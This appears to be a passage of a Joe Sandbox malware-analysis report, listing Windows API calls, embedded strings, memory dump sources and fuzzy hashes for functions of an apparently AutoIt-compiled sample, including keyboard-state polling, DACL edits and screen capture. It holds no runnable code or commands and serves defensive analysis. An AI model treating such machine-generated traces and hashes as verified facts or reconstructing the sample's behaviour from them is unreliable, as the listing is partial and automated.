                      • Part of subcall function 00C9313D: __wcsicmp_l.LIBCMT ref: 00C931C6
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: Load$Image$LibraryMessageSend$CursorDestroyExtractFreeIcon__wcsicmp_l
                    • String ID: .dll$.exe$.icl
                    • API String ID: 3907162815-1154884017
                    • Opcode ID: ae7caeb493ea42e38bae575730aa373494ee7c6b51f75270a590ebd6e45cfd7e
                    • Instruction ID: 63dec8de914d73c9755ce5f71a529e933fd5de92322e9bfbf61b5f1a7b315032
                    • Opcode Fuzzy Hash: ae7caeb493ea42e38bae575730aa373494ee7c6b51f75270a590ebd6e45cfd7e
                    • Instruction Fuzzy Hash: 2A61CE71500619BBEB14DF64CC85FBE7BA8EF08721F10411AFA25D61D0DB74AE80DBA1
                    APIs
                      • Part of subcall function 00C79997: __itow.LIBCMT ref: 00C799C2
                      • Part of subcall function 00C79997: __swprintf.LIBCMT ref: 00C79A0C
                    • CharLowerBuffW.USER32(?,?), ref: 00CDA636
                    • GetDriveTypeW.KERNEL32 ref: 00CDA683
                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00CDA6CB
                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00CDA702
                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00CDA730
                      • Part of subcall function 00C77D2C: _memmove.LIBCMT ref: 00C77D66
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                    • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                    • API String ID: 2698844021-4113822522
                    • Opcode ID: 81467ba5add13ef1a0f1b0cf9e54dc065540299bcb41e38871751c10ed526ab4
                    • Instruction ID: 76eeed2e44c545b42fb07f1f21703545fc22454b14b3ede56a445755be9c93ec
                    • Opcode Fuzzy Hash: 81467ba5add13ef1a0f1b0cf9e54dc065540299bcb41e38871751c10ed526ab4
                    • Instruction Fuzzy Hash: 5D516A711047099FC700EF24D88196AB7F4FF98718F14896DF89A972A1DB31EE0ADB52
                    APIs
                    • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00CDA47A
                    • __swprintf.LIBCMT ref: 00CDA49C
                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 00CDA4D9
                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00CDA4FE
                    • _memset.LIBCMT ref: 00CDA51D
                    • _wcsncpy.LIBCMT ref: 00CDA559
                    • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00CDA58E
                    • CloseHandle.KERNEL32(00000000), ref: 00CDA599
                    • RemoveDirectoryW.KERNEL32(?), ref: 00CDA5A2
                    • CloseHandle.KERNEL32(00000000), ref: 00CDA5AC
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                    • String ID: :$\$\??\%s
                    • API String ID: 2733774712-3457252023
                    • Opcode ID: ff780697b163286873e0082157371632ead9afb7fc98d7ee1de021176ea76d61
                    • Instruction ID: edcfa1f08987d1e925ada8aab15cc59f7702cffb09124d61db56443dc707d4fa
                    • Opcode Fuzzy Hash: ff780697b163286873e0082157371632ead9afb7fc98d7ee1de021176ea76d61
                    • Instruction Fuzzy Hash: 84318EB650011AABDB219FA0DC89FBF73BCEF88701F1041BAFA18D6160E77097458B25
                    APIs
                    • __wsplitpath.LIBCMT ref: 00CDDC7B
                    • _wcscat.LIBCMT ref: 00CDDC93
                    • _wcscat.LIBCMT ref: 00CDDCA5
                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00CDDCBA
                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00CDDCCE
                    • GetFileAttributesW.KERNEL32(?), ref: 00CDDCE6
                    • SetFileAttributesW.KERNEL32(?,00000000), ref: 00CDDD00
                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00CDDD12
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                    • String ID: *.*
                    • API String ID: 34673085-438819550
                    • Opcode ID: de3b4b9fd3efe147a6ca0f18fc9d43ea02cf226c8ddaf5333ae2a37be6c15842
                    • Instruction ID: 3f4c02c295b6c105a957934102936efcf08f9eda8401a86e7b0f18724b0b4006
                    • Opcode Fuzzy Hash: de3b4b9fd3efe147a6ca0f18fc9d43ea02cf226c8ddaf5333ae2a37be6c15842
                    • Instruction Fuzzy Hash: 17818271904241AFCB24EF64C8459AAB7E8FF88314F15882FFA9AC7350E731DA45DB52
                    APIs
                      • Part of subcall function 00CC874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00CC8766
                      • Part of subcall function 00CC874A: GetLastError.KERNEL32(?,00CC822A,?,?,?), ref: 00CC8770
                      • Part of subcall function 00CC874A: GetProcessHeap.KERNEL32(00000008,?,?,00CC822A,?,?,?), ref: 00CC877F
                      • Part of subcall function 00CC874A: RtlAllocateHeap.NTDLL(00000000,?,00CC822A), ref: 00CC8786
                      • Part of subcall function 00CC874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00CC879D
                      • Part of subcall function 00CC87E7: GetProcessHeap.KERNEL32(00000008,00CC8240,00000000,00000000,?,00CC8240,?), ref: 00CC87F3
                      • Part of subcall function 00CC87E7: RtlAllocateHeap.NTDLL(00000000,?,00CC8240), ref: 00CC87FA
                      • Part of subcall function 00CC87E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00CC8240,?), ref: 00CC880B
                    • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00CC8458
                    • _memset.LIBCMT ref: 00CC846D
                    • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00CC848C
                    • GetLengthSid.ADVAPI32(?), ref: 00CC849D
                    • GetAce.ADVAPI32(?,00000000,?), ref: 00CC84DA
                    • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00CC84F6
                    • GetLengthSid.ADVAPI32(?), ref: 00CC8513
                    • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00CC8522
                    • RtlAllocateHeap.NTDLL(00000000), ref: 00CC8529
                    • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00CC854A
                    • CopySid.ADVAPI32(00000000), ref: 00CC8551
                    • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00CC8582
                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00CC85A8
                    • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00CC85BC
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: HeapSecurity$AllocateDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                    • String ID:
                    • API String ID: 2347767575-0
                    • Opcode ID: 16bc994b2954be965633fa80c34b09ca53857ec4c24f1f61a3f492635102bc45
                    • Instruction ID: 3dd576ff9571508ed49bb4c5bd147c71ed305d3cc4c650341844b7f87baa2c16
                    • Opcode Fuzzy Hash: 16bc994b2954be965633fa80c34b09ca53857ec4c24f1f61a3f492635102bc45
                    • Instruction Fuzzy Hash: 4C611771900219ABDF109FA4DC45FAEBBB9FF08300B14816EF925A7291DB719A19DF60
                    APIs
                    • GetDC.USER32(00000000), ref: 00CE76A2
                    • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00CE76AE
                    • CreateCompatibleDC.GDI32(?), ref: 00CE76BA
                    • SelectObject.GDI32(00000000,?), ref: 00CE76C7
                    • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00CE771B
                    • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00CE7757
                    • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00CE777B
                    • SelectObject.GDI32(00000006,?), ref: 00CE7783
                    • DeleteObject.GDI32(?), ref: 00CE778C
                    • DeleteDC.GDI32(00000006), ref: 00CE7793
                    • ReleaseDC.USER32(00000000,?), ref: 00CE779E
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                    • String ID: (
                    • API String ID: 2598888154-3887548279
                    • Opcode ID: 85b5ec6b45111b87da78c3b76c3b8886e66cf0d565da2a18495270acdba15c2f
                    • Instruction ID: d552d3bb0ad8e6a8466d1f346e46d6a8938557de928707c08a661bb654cc57b6
                    • Opcode Fuzzy Hash: 85b5ec6b45111b87da78c3b76c3b8886e66cf0d565da2a18495270acdba15c2f
                    • Instruction Fuzzy Hash: 5C516775904249EFCB15CFA9CC89FAEBBB9EF48310F14852DF95AA7210D731A941CB60
                    APIs
                    • LoadStringW.USER32(00000066,?,00000FFF,00CFFB78), ref: 00CDA0FC
                      • Part of subcall function 00C77F41: _memmove.LIBCMT ref: 00C77F82
                    • LoadStringW.USER32(?,?,00000FFF,?), ref: 00CDA11E
                    • __swprintf.LIBCMT ref: 00CDA177
                    • __swprintf.LIBCMT ref: 00CDA190
                    • _wprintf.LIBCMT ref: 00CDA246
                    • _wprintf.LIBCMT ref: 00CDA264
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: LoadString__swprintf_wprintf$_memmove
                    • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                    • API String ID: 311963372-2391861430
                    • Opcode ID: 84adbb6fff9541765abaf8a2bd821d0ff7b2411cb5b40cb1e630811badf92753
                    • Instruction ID: 6ee905c9ed792a3d3fc03622d8fe8ebb0575a3d9d08fcf13d285f7fdf4d4fc5e
                    • Opcode Fuzzy Hash: 84adbb6fff9541765abaf8a2bd821d0ff7b2411cb5b40cb1e630811badf92753
                    • Instruction Fuzzy Hash: 65514F71900219BACF15EBE0CD86EEEB779EF14300F104165F519B21A1EB316F59EB61
                    APIs
                      • Part of subcall function 00C90B9B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00C76C6C,?,00008000), ref: 00C90BB7
                      • Part of subcall function 00C748AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00C748A1,?,?,00C737C0,?), ref: 00C748CE
                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00C76D0D
                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00C76E5A
                      • Part of subcall function 00C759CD: _wcscpy.LIBCMT ref: 00C75A05
                      • Part of subcall function 00C9387D: _iswctype.LIBCMT ref: 00C93885
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                    • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                    • API String ID: 537147316-1018226102
                    • Opcode ID: 000b680cc33495336ab0b45acb1aac3512e1f41975053d905d5bab9099036972
                    • Instruction ID: 50daffa706150fda0be607b70f6bc0be7c2a8175f7a3f5b8ac1862e6a40a8e45
                    • Opcode Fuzzy Hash: 000b680cc33495336ab0b45acb1aac3512e1f41975053d905d5bab9099036972
                    • Instruction Fuzzy Hash: 9302B0301087419FC724EF24C881AAFBBE5FF95354F04891DF49A972A1DB70DA49EB92
                    APIs
                    • _memset.LIBCMT ref: 00C745F9
                    • GetMenuItemCount.USER32(00D36890), ref: 00CAD7CD
                    • GetMenuItemCount.USER32(00D36890), ref: 00CAD87D
                    • GetCursorPos.USER32(?), ref: 00CAD8C1
                    • SetForegroundWindow.USER32(00000000), ref: 00CAD8CA
                    • TrackPopupMenuEx.USER32(00D36890,00000000,?,00000000,00000000,00000000), ref: 00CAD8DD
                    • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00CAD8E9
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
                    • String ID:
                    • API String ID: 2751501086-0
                    • Opcode ID: e753022dd9aafe5e5ca7fd4ca73232e854dec50c7894976aefb3faf89a360ce7
                    • Instruction ID: 57070dff6115d732c0dad371a09887f31fb5efc82530d25d141cc18b676662ba
                    • Opcode Fuzzy Hash: e753022dd9aafe5e5ca7fd4ca73232e854dec50c7894976aefb3faf89a360ce7
                    • Instruction Fuzzy Hash: CD712970604206BFEB248F65DC89FAEBF64FF06368F104216F52AA61E0C7B19D50DB91
                    APIs
                    • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00CF0038,?,?), ref: 00CF10BC
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: BuffCharUpper
                    • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                    • API String ID: 3964851224-909552448
                    • Opcode ID: 68b2dc38848499e12fcb210bd7b66c7bed677c21667e31016baf2c468b013d77
                    • Instruction ID: 1b565950f68a54cf8cbd76e6786e0e490ed9e2e1f5139ffbaa0f132d8b8259f5
                    • Opcode Fuzzy Hash: 68b2dc38848499e12fcb210bd7b66c7bed677c21667e31016baf2c468b013d77
                    • Instruction Fuzzy Hash: FE418B3111029ECFCF11EF94E895AFE3324BF21314F148415FEA15B291DB70AA5ADB62
                    APIs
                      • Part of subcall function 00C77D2C: _memmove.LIBCMT ref: 00C77D66
                      • Part of subcall function 00C77A84: _memmove.LIBCMT ref: 00C77B0D
                    • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00CD55D2
                    • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00CD55E8
                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00CD55F9
                    • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00CD560B
                    • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00CD561C
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: SendString$_memmove
                    • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                    • API String ID: 2279737902-1007645807
                    • Opcode ID: f54293bfe9f7620442d73574ca5854f279f6ffacd8680ce144585976a0a2a028
                    • Instruction ID: 1edb9d71e649cfef58226477d374a82390caf1ca5f68537dd02e9d8024dbe687
                    • Opcode Fuzzy Hash: f54293bfe9f7620442d73574ca5854f279f6ffacd8680ce144585976a0a2a028
                    • Instruction Fuzzy Hash: EE11D33055016D7ED720F6A6DC49DBF7B7CEFA1B10F40056AB414A21C1DE605E09C5B1
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                    • String ID: 0.0.0.0
                    • API String ID: 208665112-3771769585
                    • Opcode ID: b28f555b86bf93b48acb854ca274097743f4a7fe38f0747837315972f82a6f60
                    • Instruction ID: 1205d9c2679bb975df4418fef8b439d0978be54c66f92ba8c9894e569f253643
                    • Opcode Fuzzy Hash: b28f555b86bf93b48acb854ca274097743f4a7fe38f0747837315972f82a6f60
                    • Instruction Fuzzy Hash: E6112731904115ABCB24EB65DC4AFEF77BCDF01710F0501BBF65492191EF719A82D662
                    APIs
                    • timeGetTime.WINMM ref: 00CD521C
                      • Part of subcall function 00C90719: timeGetTime.WINMM(?,75A8B400,00C80FF9), ref: 00C9071D
                    • Sleep.KERNEL32(0000000A), ref: 00CD5248
                    • EnumThreadWindows.USER32(?,Function_000651CA,00000000), ref: 00CD526C
                    • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00CD528E
                    • SetActiveWindow.USER32 ref: 00CD52AD
                    • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00CD52BB
                    • SendMessageW.USER32(00000010,00000000,00000000), ref: 00CD52DA
                    • Sleep.KERNEL32(000000FA), ref: 00CD52E5
                    • IsWindow.USER32 ref: 00CD52F1
                    • EndDialog.USER32(00000000), ref: 00CD5302
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                    • String ID: BUTTON
                    • API String ID: 1194449130-3405671355
                    • Opcode ID: 8bc3e76cae3db285c194404bf04d38cdd0c83474c94e7d18eadf51aa1aba044a
                    • Instruction ID: 33f043ce6fe4f2084b5efb7bb1ead852cce70bb7e48892f4ef16f45c3f589031
                    • Opcode Fuzzy Hash: 8bc3e76cae3db285c194404bf04d38cdd0c83474c94e7d18eadf51aa1aba044a
                    • Instruction Fuzzy Hash: 84219DB0204B04AFEB145F60EC88B3A3B69EF54387F00142AF601C23B1CBA19D05DB36
                    APIs
                    • GetKeyboardState.USER32(?), ref: 00CD05A7
                    • SetKeyboardState.USER32(?), ref: 00CD0612
                    • GetAsyncKeyState.USER32(000000A0), ref: 00CD0632
                    • GetKeyState.USER32(000000A0), ref: 00CD0649
                    • GetAsyncKeyState.USER32(000000A1), ref: 00CD0678
                    • GetKeyState.USER32(000000A1), ref: 00CD0689
                    • GetAsyncKeyState.USER32(00000011), ref: 00CD06B5
                    • GetKeyState.USER32(00000011), ref: 00CD06C3
                    • GetAsyncKeyState.USER32(00000012), ref: 00CD06EC
                    • GetKeyState.USER32(00000012), ref: 00CD06FA
                    • GetAsyncKeyState.USER32(0000005B), ref: 00CD0723
                    • GetKeyState.USER32(0000005B), ref: 00CD0731
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: State$Async$Keyboard
                    • String ID:
                    • API String ID: 541375521-0
                    • Opcode ID: 58d29d96e4191ce2268dead88f3d73ce45a2e89606c223b04a2da536ea025f91
                    • Instruction ID: efd4bc0992f868ab00aca2fe9c20dc32823536a69266a6b177f66209c8bdde85
                    • Opcode Fuzzy Hash: 58d29d96e4191ce2268dead88f3d73ce45a2e89606c223b04a2da536ea025f91
